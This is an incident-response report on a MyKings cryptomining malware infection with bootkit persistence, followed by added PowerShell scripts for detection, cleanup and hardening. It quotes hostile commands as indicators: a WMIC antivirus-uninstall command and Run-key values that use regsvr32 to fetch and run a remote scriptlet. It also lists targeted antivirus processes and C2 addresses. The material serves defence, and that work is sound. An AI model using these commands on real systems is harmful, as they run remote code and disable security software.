Investigating MyKings Malware Variant With Bootkit Persistence
INCIDENT DESCRIPTION
This malware event was detected and blocked on 16 January 2020, when a malicious executable (winnts.exe) used a trusted application (powershell.exe) to download and run a malicious script from a malicious IP address. The script was retrieved, and further analysis and incident response were carried out on the infected server.
Further analysis of the batch file showed that the script abused PowerShell to download additional malware files from the command-and-control (C2) IP address.
Our findings, detailed in the next section, confirmed that the file is malicious; our analysts subsequently contained the attack and completed remediation on 4 March 2020. The malware attempted to uninstall other antivirus products on the system and created scheduled tasks that run automatically to hijack system resources for cryptocurrency mining. The malware family is MyKings, which adds the infected system to a botnet that mines cryptocurrency for the attacker.
SYSTEM AFFECTED BY INCIDENT | Details |
--- | --- |
Type of Incident Detected | Malicious code |
Potential Damages by Incident | Reduced system performance; network resource consumption |
Attack Source | 167.88.180.175 |
Operating System of Affected System | Windows Server 2012 R2 Standard |
Additional System Details | The server has our malware defense suite installed, which allowed our analysts to carry out in-depth analysis of the malware and to prevent and block it from running again. |
INVESTIGATION INDICATORS
To analyze the file, we downloaded the script and ran it in a sandbox with real-time interaction and process monitoring. From the observed behaviour, both malicious and suspicious, we identified the tactics and techniques used. The file carried out actions falling under the following tactics:
- Execution
- Persistence
- Privilege Escalation
- Defense Evasion
- Credential Access
- Command and Control
The file used legitimate Windows components (the registry, PowerShell, Scheduled Tasks and WMIC) to schedule tasks, create and run processes, and drop additional malware files in the Windows installation directory.
Submitting the file to other malware analysis platforms also classified it as malicious, with a threat score of 100/100.
Use of WMIC
The malware used Windows Management Instrumentation (WMI) to uninstall antivirus products: it queries installed products by name through WMIC and calls their uninstall method. Below is the command it used in attempting to uninstall Norton:
"C:\Windows\System32\Wbem\WMIC.exe" product where "name like '%Norton Security%'" call uninstall /nointeractive
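As an added example (not part of the original report), the following PowerShell flags WMIC-based antivirus uninstall attempts in process-creation command lines. The sample command lines are constructed for illustration, and the vendor name list is an assumption built from the products named later in this report.

```powershell
# Added example, not from the original report. Flags command lines of the
# form "wmic product where ... call uninstall" whose WQL filter names a
# security product. The vendor hints are an assumption based on the products
# listed later in this report; extend them for your estate.
$AvNameHints = @('Norton', 'Symantec', 'McAfee', 'Kaspersky', 'Avast', 'AVG',
                 'ESET', 'Bitdefender', 'Malwarebytes', 'Sophos', '360',
                 'Avira', 'Dr.Web', 'Windows Defender')

function Test-WmicAvUninstall {
    [OutputType([bool])]
    param([string]$CommandLine)
    if ([string]::IsNullOrWhiteSpace($CommandLine)) { return $false }
    $cl = ($CommandLine -replace '\s+', ' ').Trim()
    # Any product uninstall through WMIC is unusual on a server, but only the
    # ones that target a security product are flagged here.
    if ($cl -notmatch '(?i)\bwmic(\.exe)?\b.*\bproduct\b.*\bcall uninstall\b') { return $false }
    foreach ($hint in $AvNameHints) {
        if ($cl -match ('(?i)' + [regex]::Escape($hint))) { return $true }
    }
    return $false
}

# Constructed sample command lines (not real telemetry from the incident).
$Samples = @(
    '"C:\Windows\System32\Wbem\WMIC.exe" product where "name like ''%Norton Security%''" call uninstall /nointeractive',
    'wmic  product where "name like ''%Kaspersky%''" call uninstall /nointeractive',
    'wmic product get name,version',
    'wmic product where "name like ''%7-Zip%''" call uninstall'
)
$Samples | ForEach-Object {
    [pscustomobject]@{ Suspicious = (Test-WmicAvUninstall $_); CommandLine = $_ }
} | Format-Table -AutoSize

# Apply the same test to Security log process-creation events (4688). The
# command line is Properties[8] in the 4688 template on Server 2012 R2 and
# later, and is only populated when "Include command line in process creation
# events" is enabled by policy; verify the index on your build.
function Find-WmicAvUninstallEvents {
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -ErrorAction SilentlyContinue |
        Where-Object { $_.Properties.Count -gt 8 -and (Test-WmicAvUninstall ([string]$_.Properties[8].Value)) } |
        Select-Object TimeCreated, @{ Name = 'CommandLine'; Expression = { $_.Properties[8].Value } }
}
```

The first two sample lines are flagged, the inventory query and the non-AV uninstall are not. The hint list trades a few false positives (a product name containing "360") for not missing a vendor; tune it rather than matching on `call uninstall` alone, which fires on legitimate software removal.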
REMEDIATION OF INCIDENT
Registry Edits
We reviewed the registry modifications made by the malware, identified the following Run-key values, and removed them. Each value launches regsvr32 with a remote scriptlet URL: regsvr32 passes the /i: argument to scrobj.dll, which fetches and executes the .sct file at boot, so the payload is re-downloaded on every start without being written to disk.
"HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN" /V "START" /D "REGSVR32 /U /S /I:HTTP://JS.FTP1202.SITE:280/V.SCT SCROBJ.DLL" /F
"HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN" /V "START" /D "REGSVR32 /U /S /I:HTTP://JS.FTP1202.SITE:280/V.SCT SCROBJ.DLL" /F
The content of one of the registry keys is seen in the figure below.
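As an added example (not part of the original report), this PowerShell enumerates the Run keys the malware wrote to, flags any value that launches regsvr32 with a remote scriptlet, and removes the hits with -WhatIf so they can be reviewed first. The HKCU key is an extra location I have added beyond the two the malware used; the value at the end is the one recorded above, used only as an offline self-check.

```powershell
# Added example, not from the original report. Finds Run-key values that
# launch regsvr32 with a remote scriptlet (/i:http... scrobj.dll), which is the
# persistence mechanism seen in this incident, and removes them for review.
$RunKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'   # added location, not in the report
)
$ProviderProps = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')

function Test-RemoteScriptletRunValue {
    [OutputType([bool])]
    param([string]$Data)
    if ([string]::IsNullOrWhiteSpace($Data)) { return $false }
    # regsvr32 hands the /i: argument to scrobj.dll's DllInstall, which fetches
    # and runs the .sct scriptlet; /u and /s only keep it silent.
    return [bool]($Data -match '(?i)regsvr32.*[/-]i:\s*https?://\S+.*scrobj\.dll')
}

function Get-SuspiciousRunValues {
    foreach ($key in $RunKeys) {
        if (-not (Test-Path -Path $key)) { continue }
        $item = Get-ItemProperty -Path $key
        foreach ($prop in $item.PSObject.Properties) {
            # Skip the provider metadata that Get-ItemProperty adds to every object
            if ($prop.Name -in $ProviderProps) { continue }
            if (Test-RemoteScriptletRunValue ([string]$prop.Value)) {
                [pscustomobject]@{ Key = $key; Name = $prop.Name; Data = $prop.Value }
            }
        }
    }
}

# Review, then remove. Drop -WhatIf once the hits have been confirmed.
$hits = @(Get-SuspiciousRunValues)
$hits | Format-Table -AutoSize
foreach ($hit in $hits) {
    Remove-ItemProperty -Path $hit.Key -Name $hit.Name -WhatIf
}

# Offline self-check against the value recorded in this report
Test-RemoteScriptletRunValue 'REGSVR32 /U /S /I:HTTP://JS.FTP1202.SITE:280/V.SCT SCROBJ.DLL'
```

The self-check returns True. Removing the value stops the re-download at the next boot but does not undo what the scriptlet already did, so the file and scheduled-task checks below still need to be run.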
Trojan Agent and Downloader
We identified the following Trojan downloader and agent binaries at these locations:
%WINDIR%\inf\aspnet\lsma.exe
%WINDIR%\inf\aspnet\lsma30.exe
%WINDIR%\inf\aspnet\lsma31.exe
%WINDIR%\inf\winnts.exe
%WINDIR%\debug\lsmo.exe
%WINDIR%\help\lsmosee.exe
Scheduled Tasks
The malware registered scheduled tasks to relaunch itself automatically. The following tasks were found in the Windows Task Scheduler:
- my1
- Mysa
- Mysa1
- Mysa2
- Mysa3
- ok
- oka
These tasks were created by the malicious PowerShell script and were deleted from the server during remediation.
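As an added example (not part of the original report) covering both the dropped files and the scheduled tasks above, this PowerShell checks a host for the listed paths and task names, compares any file found against the SHA-256 IOCs from the appendix, and stages the removals with -WhatIf. The quarantine folder path is my own choice, not something from the report.

```powershell
# Added example, not from the original report. Host triage for the file and
# scheduled-task artifacts listed in this report.
$DroppedFiles = @(
    "$env:WINDIR\inf\aspnet\lsma.exe",
    "$env:WINDIR\inf\aspnet\lsma30.exe",
    "$env:WINDIR\inf\aspnet\lsma31.exe",
    "$env:WINDIR\inf\winnts.exe",
    "$env:WINDIR\debug\lsmo.exe",
    "$env:WINDIR\help\lsmosee.exe"
)
$TaskNames = @('my1', 'Mysa', 'Mysa1', 'Mysa2', 'Mysa3', 'ok', 'oka')
$IocSha256 = @(   # from the appendix of this report
    '790c213e1227adefd2d564217de86ac9fe660946e1240b5415c55770a951abfd',
    'fea935d2d0fb1abadb900f009b4c40bb8a91fd9e25cc76ed4f9dae08960566d5'
)

function Get-DroppedFileReport {
    foreach ($path in $DroppedFiles) {
        $exists = Test-Path -Path $path -PathType Leaf
        $hash = $null
        if ($exists) { $hash = (Get-FileHash -Path $path -Algorithm SHA256).Hash.ToLower() }
        [pscustomobject]@{
            Path     = $path
            Present  = $exists
            Sha256   = $hash
            # A file at the path with a different hash is still suspicious:
            # a newer variant, not a clean system.
            KnownIoc = ($null -ne $hash -and $hash -in $IocSha256)
        }
    }
}

function Get-MaliciousTasks {
    # Task names are not unique across folders, so search the whole tree and
    # show the action, which is what actually identifies the malware.
    Get-ScheduledTask -ErrorAction SilentlyContinue |
        Where-Object { $_.TaskName -in $TaskNames } |
        Select-Object TaskPath, TaskName, State,
            @{ Name = 'Action'; Expression = { ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; ' } }
}

Get-DroppedFileReport | Format-Table -AutoSize
$tasks = @(Get-MaliciousTasks)
$tasks | Format-Table -AutoSize

# Unregister the tasks (drop -WhatIf to apply) and move the files to a
# quarantine folder rather than deleting them, so they stay available for analysis.
foreach ($t in $tasks) {
    Unregister-ScheduledTask -TaskPath $t.TaskPath -TaskName $t.TaskName -Confirm:$false -WhatIf
}
$quarantine = Join-Path $env:SystemDrive 'Quarantine'   # assumed location
foreach ($f in (Get-DroppedFileReport | Where-Object Present)) {
    if (-not (Test-Path $quarantine)) { New-Item -ItemType Directory -Path $quarantine | Out-Null }
    Move-Item -Path $f.Path -Destination $quarantine -WhatIf
}
```

Run it elevated. Remove the tasks before moving the files: a task that fires while the binary is still in place can re-create the other artifacts, and a running process will also hold the file open, so stop it first if Move-Item fails.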
Bootkit Persistence
The malware installed a bootkit (a rootkit loaded before the operating system boots) on the server. Loading that early lets it terminate the antivirus processes listed below before they start and ensures the malware returns after a reboot. This was removed from the server. The antivirus processes it terminates are listed below.
avp.exe | acaegmgr.exe | sapissvc.exe |
superkiller.exe | avastsvc.exe | avgsvc.exe |
360sd.exe | bdagent.exe | aycagentsrv.ayc |
360safe.exe | mcshield.exe | liveupdate360.exe |
360rps.exe | mcsvhost.exe | 360rp |
kavfs.exe | mfefire.exe | qqpctray.exe |
sragent.exe | mfemms.exe | Mcshield.exe |
mbamservice.exe | arwsrvc.exe | shstat.exe |
avguard.exe | dwarkdaemon.exe | naprdmgr.exe |
avgnt.exe | vssery.exe | avgui.exe |
msmpeng.exe | ahnsdsv.exe | ekrn.exe |
nissrv.exe | asdsvc.exe | dwengine.exe |
msseces.exe | kavfswp.exe | spideragent.exe |
avengine.exe | mbamservice.exe | bdagent.exe |
savservice.exe | mbam.exe | hipsmain.exe |
nod32krn.exe | qhpisvr.exe | avastui.exe |
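As an added example (not part of the original report, which does not describe the bootkit's internals), the following PowerShell reads the first sector of the boot disk, parses it and hashes the boot code so it can be compared against a baseline taken from a clean build of the same server. It assumes \\.\PhysicalDrive0 is the boot disk and needs an elevated session; the sector built at the end is constructed so the parser can be exercised offline.

```powershell
# Added example, not from the original report. A bootkit that runs before the
# OS must replace the boot sector code or what it chains to, so dump the
# sector, parse it and hash the boot code for comparison with a known-good
# baseline. Assumes \\.\PhysicalDrive0 is the boot disk; requires elevation.
function Read-BootSector {
    param([string]$DevicePath = '\\.\PhysicalDrive0')
    $fs = New-Object System.IO.FileStream($DevicePath, [System.IO.FileMode]::Open,
                                          [System.IO.FileAccess]::Read, [System.IO.FileShare]::ReadWrite)
    try {
        $sector = New-Object byte[] 512
        if ($fs.Read($sector, 0, 512) -ne 512) { throw "Short read from $DevicePath" }
        return ,$sector
    } finally { $fs.Dispose() }
}

function Get-BootSectorSummary {
    param([Parameter(Mandatory)][byte[]]$Sector)
    if ($Sector.Length -ne 512) { throw 'Expected a 512-byte sector' }
    $sha = [System.Security.Cryptography.SHA256]::Create()
    # Bytes 0-439: boot code (what a bootkit replaces); 446-509: four 16-byte
    # partition entries; 510-511: the 0x55 0xAA signature.
    $bootCode = [byte[]]$Sector[0..439]
    $partitions = foreach ($i in 0..3) {
        $off = 446 + 16 * $i
        if ($Sector[$off + 4] -eq 0) { continue }   # empty entry
        [pscustomobject]@{
            Index    = $i
            Bootable = ($Sector[$off] -eq 0x80)
            Type     = ('0x{0:X2}' -f $Sector[$off + 4])   # 0xEE = GPT protective MBR
            StartLba = [BitConverter]::ToUInt32($Sector, $off + 8)
            Sectors  = [BitConverter]::ToUInt32($Sector, $off + 12)
        }
    }
    [pscustomobject]@{
        ValidSignature = ($Sector[510] -eq 0x55 -and $Sector[511] -eq 0xAA)
        BootCodeSha256 = (($sha.ComputeHash($bootCode) | ForEach-Object { $_.ToString('x2') }) -join '')
        Partitions     = @($partitions)
    }
}

# Constructed sector for an offline run: zeroed boot code, one bootable NTFS
# partition starting at LBA 2048, valid signature.
$demo = New-Object byte[] 512
$demo[446] = 0x80; $demo[450] = 0x07
[BitConverter]::GetBytes([uint32]2048).CopyTo($demo, 454)
[BitConverter]::GetBytes([uint32]204800).CopyTo($demo, 458)
$demo[510] = 0x55; $demo[511] = 0xAA
Get-BootSectorSummary -Sector $demo | Format-List

# Live check: compare BootCodeSha256 with the value recorded from a clean
# build; any change means the boot code needs to be examined.
# Get-BootSectorSummary -Sector (Read-BootSector) | Format-List
```

This only covers legacy BIOS boot. On a UEFI system the firmware never executes the MBR boot code (the parser will show a single 0xEE protective entry), and the equivalent baseline is the boot manager in the EFI system partition. A matching hash rules out a boot-sector modification, not a bootkit that hooks later in the chain, so the check complements rather than replaces the antivirus vendor's removal.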
RECOMMENDATION
As identified during the investigation, the system was breached through the EternalBlue exploit, which targets the SMBv1 vulnerability fixed by MS17-010 and which was still present on the server. The system was updated, the malicious program was removed, and the actions taken by it were reversed.
The following recommendations are to be put in place to prevent a recurrence of this incident.
- Applications should be downloaded from verified publishers only.
- The use of cracked/patched software should be avoided.
- Regular Windows updates on all systems.
- Installation of EDR on all endpoints on the network to stop potential attacks and prevent them from infecting other systems on the network.
- Rebuilding or upgrading the server from a Windows Server image so as to fix the broken Windows automatic updates.
- Disable unnecessary services such as RDP (and SMBv1, which EternalBlue targets) on internet-facing computers.
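As an added example (not part of the original report), this PowerShell checks the state of the controls the recommendations above call for on a Windows Server 2012 R2 host: whether SMBv1 is enabled, whether an MS17-010 package is recorded as installed, and whether RDP is enabled and listening. The KB numbers are the 2012 R2 MS17-010 packages (security-only update and monthly rollup); the report itself names none.

```powershell
# Added example, not from the original report. Verifies the hardening points
# above on Windows Server 2012 R2. Requires an elevated session.
$Ms17010Kbs = @('KB4012213', 'KB4012216')   # 2012 R2 security-only / monthly rollup
$TsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'

function Get-HardeningReport {
    $smb = Get-SmbServerConfiguration
    # Get-HotFix only lists packages still recorded as installed; a later
    # cumulative rollup supersedes these KBs, so the newest hotfix date is
    # reported too. A host with neither the KB nor a post-March-2017 rollup
    # is unpatched.
    $hotfixes = Get-HotFix
    $hasFix = [bool]($hotfixes | Where-Object { $_.HotFixID -in $Ms17010Kbs })
    $newest = ($hotfixes | Sort-Object InstalledOn | Select-Object -Last 1).InstalledOn
    $rdp = Get-ItemProperty -Path $TsKey -Name fDenyTSConnections
    $rdpListening = [bool](Get-NetTCPConnection -LocalPort 3389 -State Listen -ErrorAction SilentlyContinue)
    [pscustomobject]@{
        Smb1Enabled        = $smb.EnableSMB1Protocol
        Ms17010PackageSeen = $hasFix
        NewestHotfixDate   = $newest
        RdpDisabled        = ($rdp.fDenyTSConnections -eq 1)
        RdpListening       = $rdpListening
    }
}

$report = Get-HardeningReport
$report | Format-List

# SMBv1 can be switched off in place; it is the protocol EternalBlue exploits
# and nothing on a 2012 R2 server needs it unless a legacy client does.
if ($report.Smb1Enabled) {
    Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
}
# Disabling RDP on a remotely managed server can lock administrators out, so
# this is left as a dry run; drop -WhatIf after confirming another access path.
if (-not $report.RdpDisabled) {
    Set-ItemProperty -Path $TsKey -Name fDenyTSConnections -Value 1 -WhatIf
}
```

Patch state is the one finding the script cannot fix itself; that needs Windows Update, which the report notes was broken on this server and is why a rebuild from a known-good image is recommended.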
Appendix
IOCs
IP Addresses:
103.106.250.161
167.88.180.175
167.88.180.188
173.247.239.186
199.168.100.74
Hashes (SHA-256)
790c213e1227adefd2d564217de86ac9fe660946e1240b5415c55770a951abfd
fea935d2d0fb1abadb900f009b4c40bb8a91fd9e25cc76ed4f9dae08960566d5